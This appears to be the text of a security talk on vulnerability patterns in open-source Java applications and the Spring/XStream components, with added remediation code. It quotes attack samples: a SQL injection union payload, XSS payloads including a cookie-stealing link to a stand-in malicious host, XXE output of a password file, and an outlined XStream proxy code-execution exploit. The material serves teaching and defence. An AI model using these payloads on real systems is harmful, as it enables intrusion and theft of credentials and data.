© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Critical vulnerability patterns in open-source Java
Alvaro Muñoz, Software Security Researcher

Whois

Alvaro Muñoz
Employer: Hewlett-Packard
Organization: HP Software Security Research
Responsibilities: Research the security impact of new technologies. Especially interested in Web stuff, any language, any framework.
In previous episodes: Application Security Consultant, Pentester
Other stuff: CTF player, OSCP, GWAPT, CISSP …
Location: Madrid, Spain
@pwntester

Critical vulnerability patterns in open-source Java

Agenda
1. Why should I care in the first place?
2. OSS Security Posture
3. Critical issues in OSS applications
4. Critical issues in OSS components
5. Disclosure in the open source world
6. Five steps to open source peace of mind

Why should I care in the first place?

Some metrics

“By 2015 ninety-nine percent of mission critical applications in Global 2000 companies will contain open source.”
“80% of the code in today’s applications comes from libraries and frameworks”
“More than half of Global 500 companies are using open source applications with known vulnerabilities”
“26% of library downloads have known vulnerabilities”

Gartner, Sonatype & Aspect Security
Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf

Using Components with Known Vulnerabilities
New OWASP Top 10 2013 – A9
Source: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/OWASP-Top-Ten-2013/ba-p/6046369

OSS Security Posture

The research

Goal:
• Figure out the security posture of Open Source Software

Procedure:
• Analyze 10 popular Java open source applications with Fortify SCA
• Use the same Fortify SCA version and rulepacks for all tests
• Scan the latest released snapshot as well as a three-year-old version
• Focus on the critical issues only
• Manually review a popular open source library

The applications

• Apache ActiveMQ: Messaging and Integration Patterns server
• Liferay Portal: Portlet container
• Apache Tomcat: Implementation of the Java Servlet and JSP technologies
• JBoss: Application server that implements Java EE
• Cruise Control: Continuous integration server
• Apache Roller: Full-featured, multi-user and group-blog server
• OFBiz: Enterprise resource planning (ERP) system
• OpenCMS: Website content management system
• Pebble: A lightweight, open source blogger
• Mifos: Microfinance institution management system

SCA Findings

Finding categories (table columns): Persistent XSS, Reflected XSS, Insecure Password Submission, SQL Injection, Path Manipulation, Privacy Violation, XML External Entity Injection, Command Injection

Applications (table rows) and the number of categories flagged for each; which columns the check marks fall in is not recoverable from the extracted text:
• ActiveMQ: 5
• Apache Roller: 2
• Apache Tomcat: 4
• Cruise Control: 3
• JBoss: 2
• Liferay Portal: 4
• OFBiz: 4
• OpenCMS: 3
• Pebble: 2
• Mifos: 2

# Critical findings

(Bar chart: number of critical findings per application, "3 years" version vs. "Current" version; y-axis 0 to 120.)

# Critical findings Density

(Bar chart: density of critical findings per application, "3 years" version vs. "Current" version; y-axis 0 to 7.)

Critical issues in OSS Applications

Example 1: SQL Injection

    String uid = request.getParameter("id");
    String query = "select name from Users where id = " + uid;
    dbconn.executeQuery(query);

Request: http:///page.jsp?id=1
Query executed: SELECT name FROM Users WHERE id = 1

Example 1: SQL Injection

    String uid = request.getParameter("id");
    String query = "select name from Users where id = " + uid;
    dbconn.executeQuery(query);

Request: http:///page.jsp?id=1 union select ccid from Cards
Query executed: SELECT name FROM Users WHERE id = 1 UNION SELECT ccid FROM Cards

Example 1: SQL injection (dataflow diagram)

    @GET
    @Consumes({ MediaType.APPLICATION_JSON })
    @Produces({ MediaType.APPLICATION_JSON })
    public String retrieveStaff(UriInfo uriInfo, @QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) {
        context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions);
        // sqlSearch arrives straight from the query string and is passed on unchanged
        final Collection staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId);
        final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters());
        return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS);
    }


    @Override
    public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) {
        // the request value is turned into a SQL fragment here
        final String extraCriteria = getStaffCriteria(sqlSearch, officeId);
        return retrieveAllStaff(extraCriteria);
    }


    private String getStaffCriteria(final String sqlSearch, final Long officeId) {
        String extraCriteria = "";
        if (sqlSearch != null) {
            // the caller's string is concatenated into the WHERE clause as-is
            extraCriteria = " and (" + sqlSearch + ")";
        }
        if (officeId != null) {
            extraCriteria += " and office_id = " + officeId;
        }
        if (StringUtils.isNotBlank(extraCriteria)) {
            extraCriteria = extraCriteria.substring(4);
        }
        return extraCriteria;
    }



    private Collection retrieveAllStaff(final String extraCriteria) {
        final StaffMapper rm = new StaffMapper();
        String sql = "select " + rm.schema();
        if (StringUtils.isNotBlank(extraCriteria)) {
            sql += " where " + extraCriteria;
        }
        sql = sql + " order by s.lastname";
        // the assembled string is executed with no bound parameters: the sink
        return this.jdbcTemplate.query(sql, rm, new Object[] {});
    }
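The two SQL injection examples above (the three-line page.jsp snippet and the retrieveStaff call chain) share one root cause: request data becomes part of the SQL text. The fix is to bind every value as a parameter and to stop accepting a free-form SQL fragment at all. The following is an added example written for this page, not code from Mifos or from the original slides; the StaffQuery class, the column allowlist and the m_staff table and column names are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

/** Added example: builds the staff query with bound parameters instead of string concatenation. */
public final class StaffQuery {

    /** Columns a caller may search on (assumed names). Anything else is rejected before it reaches the SQL text. */
    private static final Set<String> SEARCHABLE_COLUMNS =
            new HashSet<>(Arrays.asList("firstname", "lastname", "display_name"));

    private final String sql;
    private final List<Object> params;

    private StaffQuery(String sql, List<Object> params) {
        this.sql = sql;
        this.params = Collections.unmodifiableList(params);
    }

    public String sql() { return sql; }
    public List<Object> params() { return params; }

    /**
     * searchColumn/searchValue replace the old free-form "sqlSearch" fragment; officeId is bound.
     * A null searchColumn or officeId means "no filter on that field".
     */
    public static StaffQuery build(String searchColumn, String searchValue, Long officeId) {
        StringBuilder sql = new StringBuilder(
                "select s.id, s.firstname, s.lastname, s.office_id from m_staff s");
        List<Object> params = new ArrayList<>();
        List<String> where = new ArrayList<>();

        if (searchColumn != null) {
            // The column name is checked against the allowlist; the request string never becomes SQL.
            String column = searchColumn.toLowerCase();
            if (!SEARCHABLE_COLUMNS.contains(column)) {
                throw new IllegalArgumentException("not a searchable column: " + searchColumn);
            }
            if (searchValue == null) {
                throw new IllegalArgumentException("search value required for column " + column);
            }
            where.add("s." + column + " like ?");
            params.add("%" + searchValue + "%");   // travels as a bound value, never as SQL text
        }
        if (officeId != null) {
            where.add("s.office_id = ?");
            params.add(officeId);
        }
        if (!where.isEmpty()) {
            sql.append(" where ").append(String.join(" and ", where));
        }
        sql.append(" order by s.lastname");
        return new StaffQuery(sql.toString(), params);
    }

    /** Runs the query over a live connection; the values are bound, so they cannot change the statement. */
    public List<String> run(Connection conn) throws SQLException {
        List<String> names = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            for (int i = 0; i < params.size(); i++) {
                ps.setObject(i + 1, params.get(i));
            }
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    names.add(rs.getString("firstname") + " " + rs.getString("lastname"));
                }
            }
        }
        return names;
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal search, then a column name shaped like the slide's union payload.
        StaffQuery q = StaffQuery.build("lastname", "Smith", 7L);
        System.out.println(q.sql());
        System.out.println(q.params());
        try {
            StaffQuery.build("1=1) union select ccid from Cards --", "x", null);
            System.out.println("ACCEPTED (unexpected)");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The main method only exercises the builder, so it runs without a database; run(Connection) is the part a service would call. A search value containing % or _ merely widens the LIKE pattern, which is harmless to the statement's structure; the only thing that can reach the SQL text is a column name that has passed the allowlist.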


Example 2: Cross-Site Scripting

Example 2: Cross Site Scripting

Request: http:///page.jsp?user=John
Response: Hi John!
Rendered: Hi John!

Example 2: Cross Site Scripting

Request: http://host/page.jsp?user=<script>alert("xss")</script>
Response: Hi <script>alert("xss")</script>!
Rendered: Hi! (and an alert dialog showing: xss)

Will you click on this link??

www.mybank.com/transfers?user=window.open("http://maliciousserver.com/cookiestealer.php?" + document.cookie());

What about this one?

http://bit.ly/XSpPhP

Example 2: Cross Site Scripting

Request: http://host/page.jsp?user=<script>alert("xss")</script>
Response: Hi <script>alert("xss")</script>!

    public String paramsAsHidden(Collection excludes) {
        StringBuffer result = new StringBuffer(512);
        Map params = new HashMap(getJsp().getRequest().getParameterMap());
        Iterator i = params.entrySet().iterator();
        while (i.hasNext()) {
            Map.Entry entry = (Map.Entry) i.next();
            String param = (String) entry.getKey();
            if ((excludes == null) || (!excludes.contains(param))) {
                // The <input type="hidden" ...> markup appended here (slide lines 9-13) was stripped in
                // extraction; only the opening quote of the first append and the trailing "\n" survived.
                result.append("\n");
            }
        }
        return result.toString();
    }

Slide annotation on the second copy of the code: Safe output encoding
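Whether the parameter name and value are written into the hidden-input markup verbatim or after HTML encoding is what decides if this loop is a cross-site scripting sink. The following is an added example written for this page, not OpenCMS code: the same loop with attribute encoding applied to both the name and the value. The encode helper, the HiddenParams class and the parameter-map shape are assumptions; in production a maintained encoder such as the OWASP Java Encoder does the same job.

```java
import java.util.Collection;
import java.util.LinkedHashMap;
import java.util.Map;

/** Added example: encodes request parameters before they are written back into HTML. */
public final class HiddenParams {

    /** Minimal HTML encoder: the five characters that can break out of text or a quoted attribute. */
    public static String encode(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Same shape as paramsAsHidden on the slide; the map mirrors ServletRequest.getParameterMap(). */
    public static String paramsAsHidden(Map<String, String[]> params, Collection<String> excludes) {
        StringBuilder result = new StringBuilder(512);
        for (Map.Entry<String, String[]> entry : params.entrySet()) {
            String param = entry.getKey();
            if (excludes != null && excludes.contains(param)) {
                continue;
            }
            for (String value : entry.getValue()) {
                // Both the name and the value land inside a double-quoted attribute, so both are encoded.
                result.append("<input type=\"hidden\" name=\"").append(encode(param))
                      .append("\" value=\"").append(encode(value)).append("\">\n");
            }
        }
        return result.toString();
    }

    public static void main(String[] args) {
        // Constructed parameter map: the second value is the slides' script payload preceded by an
        // attribute-closing quote, the shape that would break out of value="..." if left unencoded.
        Map<String, String[]> params = new LinkedHashMap<>();
        params.put("user", new String[] { "John" });
        params.put("q", new String[] { "\"><script>alert(\"xss\")</script>" });
        System.out.print(paramsAsHidden(params, null));
    }
}
```

The encoded output keeps the payload inside the attribute as inert text; the browser shows it as the literal string and never parses a new tag. Encoding the parameter name matters as much as the value, because an attacker controls both halves of a query string.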


Example 3: Path Manipulation

    public View process(HttpServletRequest request, HttpServletResponse response) throws ServletException {
        Blog blog = (Blog) getModel().get(Constants.BLOG_KEY);
        String name = request.getParameter("name");           // file name, taken from the request
        String type = request.getParameter("type");
        String path = request.getParameter("path");           // sub-directory, taken from the request
        String content = request.getParameter("fileContent");
        try {
            FileManager fileManager = new FileManager(blog, type);
            fileManager.saveFile(path, name, content);
            if (type.equals(FileMetaData.THEME_FILE)) {
                fileManager = new FileManager(blog, FileMetaData.BLOG_DATA);
                fileManager.saveFile("/theme" + path, name, content);
            }
            blog.info("File \"" + StringUtils.transformHTML(name) + "\" saved.");
        } catch (IllegalFileAccessException e) {
            return new ForbiddenView();
        } catch (IOException ioe) {
            throw new ServletException(ioe);
        }
        return new ForwardView("/editFile.secureaction");
    }

    public void saveFile(String path, String name, String content) throws IOException, IllegalFileAccessException {
        FileMetaData subDirectory = getFileMetaData(path);
        File fileToSave = new File(getFile(subDirectory), name);
        // the only guard between the request values and the file system
        if (!isUnderneathRootDirectory(fileToSave)) {
            throw new IllegalFileAccessException();
        }
        BufferedWriter writer = null;
        try {
            writer = new BufferedWriter(new FileWriter(fileToSave));
            writer.write(content);
            writer.flush();
        } finally {
            IOUtils.closeQuietly(writer);
        }
    }
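A containment check like isUnderneathRootDirectory is only as good as the path it compares: it has to run on the normalised target (so that ".." segments are already collapsed), the file name must not be allowed to carry its own directory components, and any parent that already exists should be canonicalised so a symbolic link cannot point the write outside the root. The following is an added example written for this page, not Pebble code; the SafeFileResolver class and its exception type are assumptions.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

/** Added example: resolves a user-supplied sub-directory and name under a root, refusing anything that escapes it. */
public final class SafeFileResolver {

    public static final class IllegalFileAccessException extends Exception {
        public IllegalFileAccessException(String msg) { super(msg); }
    }

    private final Path root;

    public SafeFileResolver(Path root) throws IOException {
        // Canonicalise the root once, so a symlink in the root path itself does not confuse the check.
        this.root = root.toRealPath();
    }

    /** Returns the absolute, normalised target, or throws if it would land outside the root. */
    public Path resolve(String subDirectory, String name) throws IllegalFileAccessException {
        // A file name is a single path element; separators in it mean someone is trying to steer the path.
        if (name == null || name.isEmpty() || name.contains("/") || name.contains("\\")) {
            throw new IllegalFileAccessException("invalid file name");
        }
        // Leading separators would otherwise make resolve() treat the sub-directory as absolute.
        String relative = subDirectory == null ? "" : subDirectory.replaceFirst("^[/\\\\]+", "");
        // normalize() collapses "." and ".." before the containment check is made.
        Path target = root.resolve(relative).resolve(name).normalize();
        if (!target.startsWith(root)) {
            throw new IllegalFileAccessException("path escapes root: " + target);
        }
        // The nearest existing ancestor must also canonicalise inside the root (symlink check).
        Path existing = target.getParent();
        while (existing != null && !Files.exists(existing)) {
            existing = existing.getParent();
        }
        try {
            if (existing != null && !existing.toRealPath().startsWith(root)) {
                throw new IllegalFileAccessException("path escapes root via symlink: " + existing);
            }
        } catch (IOException e) {
            throw new IllegalFileAccessException("cannot canonicalise " + existing);
        }
        return target;
    }

    public static void main(String[] args) throws Exception {
        Path root = Files.createTempDirectory("blogdata");   // constructed root for the demonstration
        SafeFileResolver r = new SafeFileResolver(root);
        System.out.println("accepted: " + r.resolve("theme", "style.css"));
        // Constructed traversal attempts: in the sub-directory, in the name, and behind a leading slash.
        String[][] attempts = { { "../../etc", "passwd" }, { "theme", "../../x" }, { "/theme/../..", "y" } };
        for (String[] a : attempts) {
            try {
                r.resolve(a[0], a[1]);
                System.out.println("ACCEPTED (unexpected): " + a[0] + " / " + a[1]);
            } catch (IllegalFileAccessException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Path.startsWith compares whole name elements, so a root of /data/blog does not accidentally match /data/blogdata the way a string prefix test would. Running the same check twice with two different roots, as the theme branch of the process() method does, is fine as long as each call resolves against its own root.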

Critical issues in OSS Components

A closer look at Spring

In their own words:

Security issues reported: Timeline

Date               CVE            Description
09 October 2012    CVE-2012-5055  Spring Security's DaoAuthenticationProvider can reveal if a username is valid
29 March 2012      CVE-2012-1833  Grails data binding vulnerability
9 September 2011   CVE-2011-2894  Spring Framework and Spring Security serialization-based remoting vulnerabilities
9 September 2011   CVE-2011-2732  Spring Security header injection vulnerability
9 September 2011   CVE-2011-2731  Spring Security privilege escalation when using RunAsManager
9 September 2011   CVE-2011-2730  Spring Framework information disclosure and remote code execution
10 August 2011     CVE-2011-0527  vFabric tc Server password obfuscation bypass
24 May 2011        CVE-2011-1942  Spring Web Services: information disclosure
5 February 2011    CVE-2009-2899  Hyperic HQ: information disclosure
27 October 2010    CVE-2010-3700  Spring Security: bypass of security constraints
17 June 2010       CVE-2010-1622  Spring Framework: execution of arbitrary code
13 May 2010        CVE-2010-1454  tc Server Runtime: unauthenticated access to remote JMX interface
23 March 2010      CVE-2009-2907  Hyperic HQ: multiple XSS
2 October 2009     CVE-2009-2898  Hyperic HQ: stored XSS
2 October 2009     CVE-2009-2897  Hyperic HQ: reflected XSS
22 April 2009      CVE-2009-1190  Spring Framework: remote denial of service

RESTful APIs

• RESTful APIs are becoming more popular
• They can be found everywhere, especially for powering up mobile applications
• The most popular frameworks for Java are JAX-RS and SpringMVC
• SpringMVC uses SpringOXM to unmarshal the incoming XML messages into Java objects

Example request body (element markup lost in extraction; the text content was): John Smith Friend

    public void createContact(Contact c) {
        save(c);
        log(c.getDescription());
    }

XML Entities
XML External Entity Injection (XXE)

(Two slides show a DOCTYPE that declares an entity and a document body that references it as &terms;. The declaration markup was lost in extraction; only the reference and the closing ]> of the DOCTYPE survive.)

Anatomy of an XXE Attack

RESTful WebService:

    public void createContact(Contact c) {
        save(c);
    }

    public Contact getContact(Long id) {
        Contact c = getContact(id);
        return c;
    }

Step 1: the client sends a contact document (element markup lost in extraction; text content): John Smith Friend

Step 2: the service stores it and returns it on request:
    Name: John
    Last name: Smith
    Description: Friend

Step 3: the client sends the same document with a DOCTYPE that declares an external entity and references it as &xxe; in the description (declaration markup lost in extraction; only the reference and the closing ]> survive)

Step 4: the stored contact now carries the contents of the file the entity pointed to:
    Name: John
    Last name: Smith
    Description:
    root:*:0:0:System:/var/root:/bin/sh
    user1:*:0:0:System:/var/root:/bin/sh
    user2:*:0:0:System:/var/root:/bin/sh
    user3:*:0:0:System:/var/root:/bin/sh

SpringOXM unmarshallers

SpringOXM is a wrapper around a variety of unmarshallers including:
• JAXB
• Castor
• XStream

Our research concludes that:
• The XStream wrapper is not vulnerable since it does not process DOCTYPE blocks
• The Castor wrapper is insecure but there is an undocumented way to secure it
• The JAXB wrapper is insecure and there is no way to secure it

Unfortunately JAXB is by far the most popular
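When the framework wrapper offers no switch, the parser has to be configured before the document reaches the unmarshaller: parse the request body yourself with DTD processing turned off, then hand the already-parsed tree to the binder. The following is an added example written for this page, not SpringOXM or JAXB code; it uses only the JDK's DocumentBuilderFactory. The HardenedContactParser class, the element names of the contact document and the file path in the constructed payload are assumptions.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

/** Added example: XML parsing configured so that any DOCTYPE, and therefore any external entity, is rejected. */
public final class HardenedContactParser {

    /** A parser factory with DTD processing turned off at every knob the JDK (Xerces) parser offers. */
    public static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject a DOCTYPE outright; on its own this closes XXE for this parser.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces for a parser that does not honour the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Parses a contact document and returns "first last: description", as the slides' service logs it. */
    public static String parseContact(String xml) throws Exception {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        Document doc = db.parse(new InputSource(new StringReader(xml)));
        return text(doc, "firstName") + " " + text(doc, "lastName") + ": " + text(doc, "description");
    }

    private static String text(Document doc, String tag) {
        NodeList nodes = doc.getElementsByTagName(tag);
        return nodes.getLength() == 0 ? "" : nodes.item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed request bodies in the shape of the slides' contact document.
        String benign = "<contact><firstName>John</firstName><lastName>Smith</lastName>"
                + "<description>Friend</description></contact>";
        // Same document with the DOCTYPE the slides describe; the file path is a placeholder.
        String withEntity = "<!DOCTYPE contact [<!ENTITY xxe SYSTEM \"file:///placeholder/secret.txt\">]>"
                + "<contact><firstName>John</firstName><lastName>Smith</lastName>"
                + "<description>&xxe;</description></contact>";
        System.out.println(parseContact(benign));
        try {
            parseContact(withEntity);
            System.out.println("ACCEPTED (unexpected)");
        } catch (SAXException e) {
            // The parser stops at the DOCTYPE; the entity is never declared, let alone resolved.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A Document produced by this factory can be passed to JAXB's Unmarshaller.unmarshal(org.w3c.dom.Node) instead of letting the binder parse raw request bytes, which is how the "no way to secure it" wrapper gets bypassed rather than fixed. Rejecting every DOCTYPE is the right default for an API that exchanges data documents; a service that genuinely needs internal DTDs has to fall back on the entity-specific features and keep them under test.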


Remote Code Execution in XStream unmarshaller

• XStream is not exactly a marshaller as it allows full object serialization
• http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized
• One interesting class: DynamicProxyConverter

What is a DynamicProxy again?

A way to intercept method calls on an interface and inject custom code

(Diagram, built up over three slides: an Interface exposing method1 and method2; an Object/Implementation with field1, field2, method1, method2 and method3; and a Proxy placed in front of the Object that intercepts method2 and runs custom code.)

Turning a Feature into a Bug

Attacker’s plan:
• Find out what Class the XML will be deserialized to
• Create a proxy for that Class the WebService is waiting for
• Intercept/hook any call to any method in the interface
• Replace the original call with the malicious payload
• Send the serialized version of the proxy
• Cross fingers
• Profit


Exploit

(Two slides show an XML request body; most of its markup was lost in extraction. Surviving fragments: an id of 1, firstName alvaro, lastName munoz and an e-mail address rendered as [email protected]; the second slide's build-up additionally names the interface org.company.model.Contact and the command calc.exe start.)

Meanwhile in the application code …

    @Controller
    @RequestMapping("/contacts")
    public class ContactController {

        @Autowired
        private ContactRepository contactRepository;

        @RequestMapping(method = RequestMethod.POST)
        @ResponseStatus(HttpStatus.CREATED)
        public final String create(@RequestBody Contact contact) {
            // first method call on the unmarshalled object: if that object is a proxy, its handler runs here
            log("Creating new contact: " + contact.getFirstName());
            contactRepository.save(contact);
            return "OK";
        }
    }
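The defence against the proxy trick, and against every other "interesting converter" in the list, is to deny XStream the right to instantiate anything the endpoint does not expect. The following is an added example written for this page, not code from the slides or from XStream's own documentation; it relies on XStream's type-permission API (XStream.addPermission and allowTypes, available from version 1.4.7, which is later than the versions discussed in the talk). The ContactUnmarshaller class and the Contact type with its fields are assumptions.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

/** Added example: an XStream instance that can only produce the types this endpoint expects. */
public final class ContactUnmarshaller {

    /** Stand-in for the slides' Contact class (assumed fields). */
    public static final class Contact {
        public long id;
        public String firstName;
        public String lastName;
        public String email;
    }

    private final XStream xstream;

    public ContactUnmarshaller() {
        xstream = new XStream();
        // Start from "nothing is allowed", then open exactly what a contact document needs.
        xstream.addPermission(NoTypePermission.NONE);
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, Contact.class });
        xstream.alias("contact", Contact.class);
    }

    public Contact fromXML(String xml) {
        return (Contact) xstream.fromXML(xml);
    }

    public static void main(String[] args) {
        ContactUnmarshaller u = new ContactUnmarshaller();
        // Constructed input in the shape a normal request would take (values from the slides' fragments).
        Contact c = u.fromXML("<contact><id>1</id><firstName>alvaro</firstName>"
                + "<lastName>munoz</lastName><email>someone@example.invalid</email></contact>");
        System.out.println("accepted: " + c.firstName + " " + c.lastName);
        // Any element that names a class outside the allowlist is refused before it is instantiated.
        // java.util.HashMap is a harmless stand-in; a proxy's interface and handler classes face the same check.
        try {
            u.fromXML("<java.util.HashMap/>");
            System.out.println("ACCEPTED (unexpected)");
        } catch (XStreamException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Compile and run with the xstream jar (1.4.7 or later) on the classpath. The point of the allowlist is that the class name in the XML stops being an instruction to the JVM: the controller's call to contact.getFirstName() can only ever reach a real Contact, because nothing else survives unmarshalling.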



Disclosure in the Open Source World

Responsible Disclosure

• Open Source projects have been notified about the issues found during this research
• Reactions cover the whole spectrum: from immediate response to no response at all

Special thanks to the developers and maintainers of the SpringSource project for their prompt responses

CodeIgniter Github Repository
https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869

(Five slides of screenshots of the pull request discussion.)

The conversation goes on …
Conclusion: 9 months after, the issue is still open!


OSS developers vs. Security Researchers Gap

Developers vs. security auditors is an ongoing battle
• OSS is not an exception
• In mature OSS projects there is a security team to smooth it out

Security researchers cannot just break in and try to change how things are done
• Developers need remediation guidance

Security issues are normally reported in a non-actionable way
• Developers need to understand issues if you want them to change their code

Avoid security buzzwords, e.g. “Cross-site scripting” vs. “Lack of output encoding”

Slide 78

Slide 78 text

78 Rewarding Researchers for Responsibly Disclosing Vulnerabilities
Zero Day Initiative (ZDI)
World’s Leading Vulnerability Bounty Program
•  Network of almost 3,000 researchers worldwide
•  $8 million paid to researchers
•  Disclosed over 1300 vulnerabilities
Patching of Critical Defects in Software
•  36% of Oracle Java’s critical vulnerabilities with CVSS > 9.0
•  ~50% of Microsoft critical vulnerabilities in 2013
Proven Thought Leadership
•  Pwn2Own hacking competition series
•  Frost & Sullivan Market Share Leader 2012
•  Leader in critical vulnerability disclosures in 2013

Slide 79

Slide 79 text

Five steps to open source peace of mind

Slide 80

Slide 80 text

80 Step 1: Identify your open source usage
1.1 Identify the open source software used throughout your company, and its versions
–  Libraries
–  Frameworks
–  Middleware
–  Applications that are 100% open source (CMS, blogs, application servers …)
1.2 Create a release policy and validate against it
–  Automate this process when possible
1.3 Use the data collected to build a profile of each project
–  Where the open source code originates
–  Where to get updates (including security alerts)
–  How often the community releases new versions

Slide 81

Slide 81 text

81 Step 2: Assess OSS for vulnerabilities / fix issues
2.1 Evaluate the open source code used in your enterprise for vulnerabilities
–  Community bug tracking system and mailing lists
–  BugTraq (www.securityfocus.com)
–  MITRE’s Common Vulnerabilities and Exposures (CVE) (cve.mitre.org)
–  Open Sourced Vulnerability Database (http://www.osvdb.org)
–  National Vulnerability Database (http://nvd.nist.gov)
2.2 Security testing
–  Automated static, dynamic, and runtime analysis of OSS components
–  Manual code review
2.3 Fixing vulnerabilities
–  Ask the open source community to fix them
–  Fix them yourself

Slide 82

Slide 82 text

82 Step 3: Develop open source usage policies
3.1 Establish a policy on acceptable open source usage within your enterprise
–  Using your inventory and risk assessments, generate a list of approved OSS
–  Maintain the approved OSS in an internal repository
–  Create the processes to update and maintain that repository
3.2 Communicate the policy to
–  Project managers
–  Developers
–  Testers
–  Architects
–  Application owners

Slide 83

Slide 83 text

83 Step 4: Develop a patch management process
4.1 Don’t forget to include OSS in your patch management process
–  When new vulnerabilities are identified:
   •  Explore possible mitigation strategies to implement until a patch is available
   •  Once a patch is released, inform your development teams
   •  Make sure there is a patch plan in place

Slide 84

Slide 84 text

84 Step 5: Create a compliance gate
5.1 Compliance validation for the OSS usage policy
–  Add a compliance check to any existing security or verification steps in your SDLC
–  Periodic compliance checks
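The automatable parts of steps 1, 2, 3 and 5 (inventory the dependencies and their versions, check them against the release policy and a known-vulnerability table, fail the gate when anything is out of policy), as an added Python example that is not from the slides or from HP; the pom.xml, the policy table and the advisory table are all constructed placeholders, not real artifacts or CVEs.

```python
import xml.etree.ElementTree as ET

# Constructed Maven pom.xml; every coordinate and version is a placeholder.
POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency><groupId>org.example</groupId><artifactId>webfw</artifactId><version>2.3.1</version></dependency>
    <dependency><groupId>org.example</groupId><artifactId>xmlparser</artifactId><version>1.0.9</version></dependency>
    <dependency><groupId>com.acme</groupId><artifactId>oldlib</artifactId><version>0.8.0</version></dependency>
  </dependencies>
</project>"""
NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Step 3: approved components (the internal repository) and the policy's minimum version.
POLICY = {"org.example:webfw": "2.3.0", "org.example:xmlparser": "1.1.0"}

# Step 2: constructed advisories as (coordinate, first affected, first fixed); in practice fed from NVD/CVE.
ADVISORIES = [("org.example:webfw", "2.0.0", "2.3.1"),
              ("org.example:xmlparser", "1.0.0", "1.1.0")]


def parse_version(v):
    """Turn '1.0.9' into (1, 0, 9) so versions compare numerically, not as strings."""
    return tuple(int(p) for p in v.split("."))


def inventory(pom_xml):
    """Step 1: coordinate -> version for every dependency declared in the pom."""
    root = ET.fromstring(pom_xml)
    deps = {}
    for d in root.findall("m:dependencies/m:dependency", NS):
        coord = d.find("m:groupId", NS).text + ":" + d.find("m:artifactId", NS).text
        deps[coord] = d.find("m:version", NS).text
    return deps


def known_issues(coord, version):
    """Advisories whose affected range [first, fixed) contains this version."""
    v = parse_version(version)
    return [a for a in ADVISORIES
            if a[0] == coord and parse_version(a[1]) <= v < parse_version(a[2])]


def compliance_gate(pom_xml):
    """Step 5: returns (passed, findings); the gate passes only with no findings."""
    findings = []
    for coord, version in inventory(pom_xml).items():
        if coord not in POLICY:
            findings.append(f"{coord}:{version} is not an approved component")
        elif parse_version(version) < parse_version(POLICY[coord]):
            findings.append(f"{coord}:{version} is below policy minimum {POLICY[coord]}")
        for _, _, fixed in known_issues(coord, version):
            findings.append(f"{coord}:{version} has a known issue (fixed in {fixed})")
    return not findings, findings
```

Wired into a build step, a `False` from `compliance_gate` is the periodic and per-release compliance check of step 5; the same inventory is what step 4 consults when a new advisory lands.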

Slide 85

Slide 85 text

Thank you!

Slide 86

Slide 86 text

Security for the new reality